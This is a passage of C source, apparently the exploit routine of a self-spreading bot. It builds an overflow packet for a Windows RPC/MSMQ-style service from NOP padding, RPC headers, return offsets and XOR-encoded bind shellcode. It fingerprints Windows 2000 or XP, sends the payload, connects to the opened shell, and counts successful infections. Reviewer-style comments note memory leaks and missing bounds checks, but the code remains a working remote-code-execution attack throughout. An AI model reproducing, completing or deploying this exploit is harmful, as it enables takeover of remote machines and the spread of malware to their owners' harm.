    unsigned long cnt;	// out-parameter: length of the bind packet
    struct sockaddr_in addr;
    int len, cpkt = 1;	// cpkt: number of times the 4172-byte request is sent
    int sockfd;
    char recvbuf[4096];
    char *buff, *ptr;
    /* f*-prefixed socket calls are wrappers defined elsewhere (not visible here) */
    if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) < 0)
        return FALSE;

    addr.sin_family = AF_INET;
    addr.sin_port = fhtons(exinfo.port);
    addr.sin_addr.s_addr = finet_addr(exinfo.ip);	// no error check on the conversion
    memset(&(addr.sin_zero), '\0', 8);

    if (fconnect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0)
        return FALSE;	// socket not closed here or on the failure paths below

    /* ownership: dce_rpc_bind() allocates; freed below only on the two failure paths */
    packet = dce_rpc_bind(0, endp, 1, &cnt);
    if (fsend(sockfd, packet, cnt, 0) == -1) { free(packet); return FALSE; }
    len = recv(sockfd, recvbuf, 4096, 0);	// NOTE(review): plain recv(), unlike the f*-wrapped calls around it
    if (len <= 0) { free(packet); return FALSE; }

    /* NOTE(review): if GetRemoteComputerName() can return NULL, strlen() on it is undefined behaviour */
    cname = GetRemoteComputerName(exinfo.ip);
	if(strlen(cname) == 0) { return FALSE; }

    /* NOTE(review): malloc() result unchecked; NOP is a macro defined elsewhere */
    buff = (char *) malloc(4172);
    memset(buff, NOP, 4172);

    ptr = buff;
    memcpy(ptr, dce_rpc_header1, sizeof(dce_rpc_header1)-1);
    ptr += sizeof(dce_rpc_header1)-1;

    /* no bound on strlen(cname) against the 4172-byte buff */
    msmq_convert_name(ptr, cname);
    ptr += strlen(cname)*2;

    memcpy(ptr, tag_private, sizeof(tag_private)-1);
    ptr += sizeof(tag_private)-1;

    /* fixed positions inside buff, written regardless of where ptr ended up */
    memcpy(buff+1048, dce_rpc_header2, sizeof(dce_rpc_header2)-1);
    memcpy(buff+1048*2, dce_rpc_header2, sizeof(dce_rpc_header2)-1);
    memcpy(buff+1048*3, dce_rpc_header3, sizeof(dce_rpc_header3)-1);

    ptr = buff;
    ptr += 438;
    memcpy(ptr, offsets, sizeof(offsets)-1);
    ptr += sizeof(offsets)-1;

	/* random bind port; stored XOR 0x0437, presumably matching a decode step in bind_shellcode (not visible here) */
	int bp = brandom(1337,65535);
    bindport = (unsigned short)bp;
    bindport ^= 0x0437;
    SET_PORTBIND_PORT(bind_shellcode, fhtons(bindport));
    memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);

    buff[4170] = '\0';
    buff[4171] = '\0';

	/* FpHost() / FP_RPC / OS_* are defined elsewhere; the fingerprint only chooses the repeat count */
	int TargetOS = FpHost(exinfo.ip, FP_RPC);
	if(TargetOS == OS_WIN2K) cpkt = 8;
	if(TargetOS == OS_WINXP) cpkt = 1;

    while (cpkt--) {
        if (fsend(sockfd, buff, 4172, 0) == -1) {
            return FALSE;	// buff leaks and the socket stays open on this path
        }
    }
	fclosesocket(sockfd);
    Sleep(500);
	free(buff);
	/* stats counter is bumped only after ConnectShellEx() reports success, unlike pnp() */
	if(ConnectShellEx(exinfo, bp) == true) { exploit[exinfo.exploit].stats++; return TRUE;}
    return FALSE;
}